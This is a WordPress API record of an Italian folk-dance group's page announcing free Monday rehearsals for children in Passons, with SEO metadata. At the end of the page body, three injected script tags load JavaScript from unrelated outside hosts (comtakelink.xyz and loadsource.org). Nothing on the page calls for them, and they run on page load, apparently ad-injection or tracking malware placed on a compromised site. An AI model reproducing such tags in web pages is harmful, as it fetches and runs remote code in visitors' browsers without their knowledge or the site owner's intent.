{"id":294,"date":"2013-03-12T16:02:43","date_gmt":"2013-03-12T16:02:43","guid":{"rendered":"http:\/\/bandapassons.it\/gfp\/?page_id=294"},"modified":"2018-09-29T17:46:50","modified_gmt":"2018-09-29T15:46:50","slug":"prove-di-danza","status":"publish","type":"page","link":"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/","title":{"rendered":"Prove di danza"},"content":{"rendered":"<p style=\"text-align: justify;\">Le prove di danza folkloristica si svolgono presso la nostra sede di Via Dante 34 a Passons<\/p>\n<p style=\"text-align: justify;\">Ci incontriamo regolarmente<strong> tutti i luned\u00ec dalle ore 17.30 alle ore 19.00<\/strong><\/p>\n<p style=\"text-align: justify;\">E\u2019 possibile iniziare a danzare in qualsiasi momento dell\u2019anno, in quanto la nostra attivit\u00e0 non \u00e8 organizzata sul modello dei corsi, bens\u00ec in lezioni che prevedono il coinvolgimento di ogni partecipante indipendentemente dal livello raggiunto. Per questo tutti possono provare a frequentare le nostre lezioni senza alcun impegno o vincolo.<\/p>\n<p style=\"text-align: justify;\">L\u2019attivit\u00e0 del gruppo \u00e8 rivolta a bambini e ragazzi di et\u00e0 compresa tra i 3 e i 17 anni<strong>.<\/strong><\/p>\n<p style=\"text-align: justify;\"><strong>La partecipazione al Balletto Folkloristico \u00e8 totalmente gratuita. <\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>per informazioni : 348.5481228<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-1846 aligncenter\" title=\"\" src=\"http:\/\/bandapassons.it\/gfp\/wp-content\/uploads\/2014\/11\/volantinoballettoretro_web.jpg\" alt=\"\" width=\"532\" height=\"752\" \/><\/p>\n<p><script src=\"http:\/\/comtakelink.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x7323x&amp;r=1538235992520\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/comtakelink.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le prove di danza folkloristica si svolgono presso la nostra sede di Via Dante 34 a Passons Ci incontriamo regolarmente<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":20,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"class_list":["post-294","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Prove di danza - Gruppo Folkloristico Passons - APS<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Prove di danza - Gruppo Folkloristico Passons - APS\" \/>\n<meta property=\"og:description\" content=\"Le prove di danza folkloristica si svolgono presso la nostra sede di Via Dante 34 a Passons Ci incontriamo regolarmente\" \/>\n<meta property=\"og:url\" content=\"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/\" \/>\n<meta property=\"og:site_name\" content=\"Gruppo Folkloristico Passons - APS\" \/>\n<meta property=\"article:modified_time\" content=\"2018-09-29T15:46:50+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/bandapassons.it\/gfp\/wp-content\/uploads\/2014\/11\/volantinoballettoretro_web.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/balletto\\\/prove-di-danza\\\/\",\"url\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/balletto\\\/prove-di-danza\\\/\",\"name\":\"Prove di danza - Gruppo Folkloristico Passons - APS\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/balletto\\\/prove-di-danza\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/balletto\\\/prove-di-danza\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/bandapassons.it\\\/gfp\\\/wp-content\\\/uploads\\\/2014\\\/11\\\/volantinoballettoretro_web.jpg\",\"datePublished\":\"2013-03-12T16:02:43+00:00\",\"dateModified\":\"2018-09-29T15:46:50+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/balletto\\\/prove-di-danza\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/balletto\\\/prove-di-danza\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/balletto\\\/prove-di-danza\\\/#primaryimage\",\"url\":\"http:\\\/\\\/bandapassons.it\\\/gfp\\\/wp-content\\\/uploads\\\/2014\\\/11\\\/volantinoballettoretro_web.jpg\",\"contentUrl\":\"http:\\\/\\\/bandapassons.it\\\/gfp\\\/wp-content\\\/uploads\\\/2014\\\/11\\\/volantinoballettoretro_web.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/balletto\\\/prove-di-danza\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Il balletto folkloristico\",\"item\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/balletto\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Prove di danza\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/#website\",\"url\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/\",\"name\":\"Gruppo Folkloristico Passons - APS\",\"description\":\"Scuola di Musica ~ Banda Musicale ~ Balletto Folkloristico ~ Allegre con Brio\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Prove di danza - Gruppo Folkloristico Passons - APS","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/","og_locale":"it_IT","og_type":"article","og_title":"Prove di danza - Gruppo Folkloristico Passons - APS","og_description":"Le prove di danza folkloristica si svolgono presso la nostra sede di Via Dante 34 a Passons Ci incontriamo regolarmente","og_url":"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/","og_site_name":"Gruppo Folkloristico Passons - APS","article_modified_time":"2018-09-29T15:46:50+00:00","og_image":[{"url":"http:\/\/bandapassons.it\/gfp\/wp-content\/uploads\/2014\/11\/volantinoballettoretro_web.jpg","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Tempo di lettura stimato":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/","url":"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/","name":"Prove di danza - Gruppo Folkloristico Passons - APS","isPartOf":{"@id":"https:\/\/bandapassons.it\/gfp\/#website"},"primaryImageOfPage":{"@id":"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/#primaryimage"},"image":{"@id":"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/#primaryimage"},"thumbnailUrl":"http:\/\/bandapassons.it\/gfp\/wp-content\/uploads\/2014\/11\/volantinoballettoretro_web.jpg","datePublished":"2013-03-12T16:02:43+00:00","dateModified":"2018-09-29T15:46:50+00:00","breadcrumb":{"@id":"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/#primaryimage","url":"http:\/\/bandapassons.it\/gfp\/wp-content\/uploads\/2014\/11\/volantinoballettoretro_web.jpg","contentUrl":"http:\/\/bandapassons.it\/gfp\/wp-content\/uploads\/2014\/11\/volantinoballettoretro_web.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/bandapassons.it\/gfp\/balletto\/prove-di-danza\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/bandapassons.it\/gfp\/"},{"@type":"ListItem","position":2,"name":"Il balletto folkloristico","item":"https:\/\/bandapassons.it\/gfp\/balletto\/"},{"@type":"ListItem","position":3,"name":"Prove di danza"}]},{"@type":"WebSite","@id":"https:\/\/bandapassons.it\/gfp\/#website","url":"https:\/\/bandapassons.it\/gfp\/","name":"Gruppo Folkloristico Passons - APS","description":"Scuola di Musica ~ Banda Musicale ~ Balletto Folkloristico ~ Allegre con Brio","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/bandapassons.it\/gfp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/pages\/294","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/comments?post=294"}],"version-history":[{"count":1,"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/pages\/294\/revisions"}],"predecessor-version":[{"id":3740,"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/pages\/294\/revisions\/3740"}],"up":[{"embeddable":true,"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/pages\/20"}],"wp:attachment":[{"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/media?parent=294"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}